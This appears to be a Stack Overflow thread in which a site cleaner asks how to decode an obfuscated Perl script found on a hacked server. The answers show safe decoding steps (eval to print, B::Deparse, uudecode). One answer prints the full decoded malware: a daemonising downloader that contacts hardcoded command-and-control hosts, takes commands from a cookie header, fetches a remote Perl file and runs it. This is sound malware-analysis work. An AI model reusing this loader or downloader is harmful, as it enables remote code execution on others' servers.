# Decrypt obfuscated perl script on hacked site

Tags: perl, deobfuscation

I was cleaning out a client's site that got hacked after I had cleaned it once already, when I found a cron job pointing to a script in the server /tmp directory:

https://pastebin.com/uXCSXxdn

The first 6 lines look like this:

```
my $gVcoQXKQ='';$gVcoQXKQ.=$_ while(<DATA>);$gVcoQXKQ=unpack('u*',$gVcoQXKQ);$gVcoQXKQ=~s/295c445c5f495f5f4548533c3c3c3d29/616962786d6065606062697f7f7c6360/gs;eval($gVcoQXKQ);
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
M($E/.CI3;V-K970["G5S92!)3SHZ4V5L96-T.PHD?"`](#$[("9M86EN*"D[
M"G-U8B!M86EN"GL*97AI="`P('5N;&5S<R!D969I;F5D("AM>2`D<&ED(#T@
```

The rest is just 121 more lines of that DATA block. I ran the file through Virustotal and it came back clean, but I am certain this is not a non-malicious file. Is there any way to safely decrypt it so I know where to look and see if it dropped another payload somewhere on the site?

Answer (score 8, accepted):

If you want to see the deobfuscated code, here are the steps to do it.  Note that **what you will be doing is dangerous**, because if you accidentally execute the code, your machine will be attacked.  You are warned.

**Note that these steps are for THIS EXAMPLE only. Other attack scripts may have other things in them. They may need other changes than what is detailed below.**

Here are the steps for the original example that was posted.

Copy all of your program into `original.pl`. It will look like this:

```
my $gVcoQXKQ='';$gVcoQXKQ.=$_ while(<DATA>);$gVcoQXKQ=unpack('u*',$gVcoQXKQ);$gVcoQXKQ=~s/295c445c5f495f5f4548533c3c3c3d29/616962786d6065606062697f7f7c6360/gs;print($gVcoQXKQ);
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
```

Change the `eval` on the first line to `print`.  **IF YOU DON'T CHANGE THE `eval` TO `print`, THEN THE NEXT STEP WILL PERFORM THE ATTACK ON YOUR MACHINE.**

Now, run the program, after you have changed the `eval` to `print`.

```
perl original.pl > unencoded.pl
```

The new `unencoded.pl` program will look like this, with no indentation:

```
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
```

Now use the `B::Deparse` module to interpret and reformat the program. **MAKE SURE YOU HAVE `-MO=Deparse` OR ELSE YOU WILL RUN THE ATTACK.**

```
perl -MO=Deparse unencoded.pl > formatted.pl   # Note the -MO=Deparse!!!
```

Running through the Deparse module will say:

```
unencoded.pl syntax OK
```

The new `formatted.pl` program will be a nicely formatted copy of the attacker's payload, 213 lines long, and you can examine what the script does.  Note that **the final program is still dangerous**, because it is the attack program that the attacker wanted to run.

Comment: Thank you. Would I be better off running this in a disposable virtual box then? Or am I safe as long as I change `eval` to `print` and make sure to include `-MO=Deparse`?

Comment: I would say you're safe, but a disposable virtual box is always safer. The instructions I gave is what @choroba and FractalLotus suggested. I just gave more detail. I put in all those warnings because I didn't want someone to come along years from now, skim over the answer, omit a step and attack their own machine.

Comment: To future generations: my answer involves no risk, and should be used instead. Basically, just use `uudecode` on the text.

Comment: @Ed. Good point, the `unpack('u*'` is the tip-off here. The formatting with Perl's Deparse module can still be done.

Answer (score 4):

The format shown is simply uuencoding. I copied the pastebin-ed text, pasted it into https://www.browserling.com/tools/uudecode, which showed it's this not-actually-obfuscated Perl code:

```
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
$| = 1; &main();
sub main
{
exit 0 unless defined (my $pid = fork);
exit 0 if $pid;
POSIX::setsid();
$SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
umask 0;
chdir "/";
open (STDIN, "</dev/null");
open (STDOUT, ">/dev/null");
open (STDERR, ">&STDOUT");
my $url = ["5.135.42.98:80","ixjeunsdms.org:80","95.216.98.49:443","heyhajksds.com:443","skjfdnlakdp.net:80"];
my $rnd = ["a".."z", "A".."Z"]; $rnd = join ("", @$rnd[map {rand @$rnd}(1..(6 + int rand 5))]);
my $dir = "/var/tmp"; if (open (F, ">", "/tmp/$rnd")) { close F; unlink "/tmp/$rnd"; $dir ="/tmp"; }
my ($header, $content);
my ($link, $file, $id, $command, $timeout) = ("en.wikipedia.org", "index.html", 1, 96, 10);
foreach my $rs (@$url)
{
$header = "$dir/" . time; $content = $header . "1";
unlink $header if -f $header; unlink $content if -f $content;
&http($rs, $timeout, $header, $content, 0);
if (open (F, "<", $header))
{
flock F, 1;
my ($test, $task) = (0, "");
while (<F>)
{
s/^\s*([^\s]?.*)$/$1/;
s/^(.*[^\s])\s*$/$1/;
next unless length $_;
$test ++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close"; $task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/;
}
close F;
($link, $file, $id, $command, $timeout) = &decxd($task) if $test == 2 && length $task;
}
unlink $header if -f $header; unlink $content if -f $content;
}
exit 0 if !defined $command || $command !~ /^16$/;
$header = "$dir/" . time; $content = "$dir/$file";
unlink $header if -f $header; unlink $content if -f $content;
&http($link, $timeout, $header, $content, 1);
my ($resp, $size) = ("000", 0);
if (open (F, "<", $header))
{
flock F, 1;
while (<F>)
{
s/^\s*([^\s]?.*)$/$1/;
s/^(.*[^\s])\s*$/$1/;
next unless length $_;
$resp = $1 if /^HTTP\S+\s+(\d\d\d)/;
}
close F;
}
$size = (stat $content)[7] if -f $content;
$size = 0 if !defined $size || $size !~ /^\d+$/;
if ($size > 0)
{
chmod 0755, $content;
system "perl $content >/dev/null 2>&1";
}
unlink $header if -f $header; unlink $content if -f $content;
foreach my $rs (@$url)
{
$header = "/dev/null"; $content = $header;
&http($rs, 10, $header, $content, 0, "$id.$resp.$size");
}
exit 0;
}
sub xorl
{
my ($line, $code, $xor, $lim) = (shift, "", 1, 16);
foreach my $chr (split (//, $line))
{
if ($xor == $lim)
{
$lim = 0 if $lim == 256;
$lim += 16;
$xor = 1;
}
$code .= pack ("C", unpack ("C", $chr) ^ $xor);
$xor ++;
}
return $code;
}
sub decxd
{
my $data = pack ("H*", shift);
@_ = unpack ("C5", substr ($data, 0, 5, ""));
return (&xorl(substr ($data, 0, shift, "")), &xorl(substr ($data, 0, shift, "")), @_);
}
sub http
{
my ($url, $timeout, $header, $content, $mode, $gecko) = @_;
$gecko = "20100101" if !defined $gecko || !length $gecko;
my ($host, $port, $path) = $url =~ /^([^\/:]+):*(\d*)?(\/?[^\#]*)/;
return unless $host;
my $addr = gethostbyname $host;
return unless $addr;
$port ||= 80;
$path ||= "/";
$addr = sockaddr_in($port, $addr);
my $readers = IO::Select->new() or return;
my $writers = IO::Select->new() or return;
my $buffer = join
(
"\x0D\x0A",
"GET $path HTTP/1.1",
"Host: $host",
"Cookie: PHPSESSID=295c445c5f495f5f4548533c3c3c3d29",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/$gecko Firefox/60.0",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.8,*/*;q=0.1",
"Accept-Language: en-us,en;q=0.8",
"Accept-Encoding: gzip, deflate",
"Accept-Charset: ISO-8859-1,utf-8;q=0.1,*;q=0.8",
"Connection: close",
"\x0D\x0A"
);
if ($mode)
{
$buffer = join
(
"\x0D\x0A",
"GET $path HTTP/1.0",
"Host: $host",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/$gecko Firefox/61.0",
"Accept: text/html,*/*",
"Connection: close",
"\x0D\x0A"
);
}
my $socket = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
return unless $socket;
$socket->blocking(0);
unless ($socket->connect($addr))
{
unless ($! == POSIX::EINPROGRESS)
{
close $socket;
return;
}
}
$writers->add($socket);
$timeout += time;
my $step = 0;
while (1)
{
IO::Select->select(undef, undef, undef, 0.02);
my $writable = (IO::Select->select(undef, $writers, undef, 0))[1];
foreach my $handle (@$writable)
{
if ($step == 0)
{
$step = 1 if $handle->connected;
}
if ($step == 1)
{
my $result = syswrite ($handle, $buffer);
if (defined $result && $result > 0)
{
substr ($buffer, 0, $result) = "";
if (!length $buffer)
{
$readers->add($handle);
$writers->remove($handle);
$step = 2;
}
}
elsif ($! == POSIX::EWOULDBLOCK)
{
next;
}
else
{
$timeout = 0;
}
}
}
my $readable = (IO::Select->select($readers, undef, undef, 0))[0];
foreach my $handle (@$readable)
{
next if $step < 2;
my $result;
if ($step == 2)
{
$result = sysread ($handle, $buffer, 8192, length $buffer);
}
else
{
$result = sysread ($handle, $buffer, 8192);
}
if (16384 < length $buffer)
{
$timeout = 0;
}
elsif (defined $result)
{
if ($result > 0)
{
if ($step == 2)
{
my $offset = index ($buffer, "\x0D\x0A\x0D\x0A");
next if $offset < 0;
if (open (F, ">>", $header))
{
flock F, 2;
binmode F;
print F substr ($buffer, 0, $offset);
close F;
}
substr ($buffer, 0, $offset + 4) = "";
$step = 3;
}
if ($step == 3)
{
if (length $buffer)
{
$buffer =~ s/%EHLO_VALUE%/295c445c5f495f5f4548533c3c3c3d29/gs;
if (open (F, ">>", $content))
{
flock F, 2;
binmode F;
print F $buffer;
close F;
}
$buffer = "";
}
}
next;
}
$timeout = 0;
}
elsif ($! == POSIX::EWOULDBLOCK)
{
next;
}
else
{
$timeout = 0;
}
}
if ($timeout < time)
{
foreach my $handle ($writers->handles, $readers->handles)
{
$writers->remove($handle) if $writers->exists($handle);
$readers->remove($handle) if $readers->exists($handle);
close $handle;
}
return;
}
}
}
```

The clues were a) recognising the distinctive format; b) also recognising the `unpack('u*')`. No machines, virtual or otherwise, were put at risk in this process.

The code has 5 URLs, and the `http` function implies it "phones home" to those, getting commands to execute in a `Set-Cookie: PHPSESSIONID=` header. I haven't analysed it further than that.

Answer (score 3):

Replace [eval](https://perldoc.perl.org/functions/eval) with [print](https://perldoc.perl.org/functions/print) to see what the script is running. The portion you provided generates readable code.

Comment: I have a long example in [Mastering Perl](https://learning.oreilly.com/library/view/mastering-perl/9780596527242/ch07.html#CHP-7-SECT-4) for decoding these sorts of things. As other answers have said, eventually perl needs the plaintext source. With an `eval`, you do as you say. There are also some tools to make variable names for palatable since there programs tend to have long, nonsense names to further confuse you.

Answer (score 1):

My first thought was to [deparse](https://perldoc.perl.org/B::Deparse) it but that won't be of much use since most of the code is in the DATA block. You could replace the eval() function with print() and let the script decode it for you. You might end up needing deparse for what print gives you.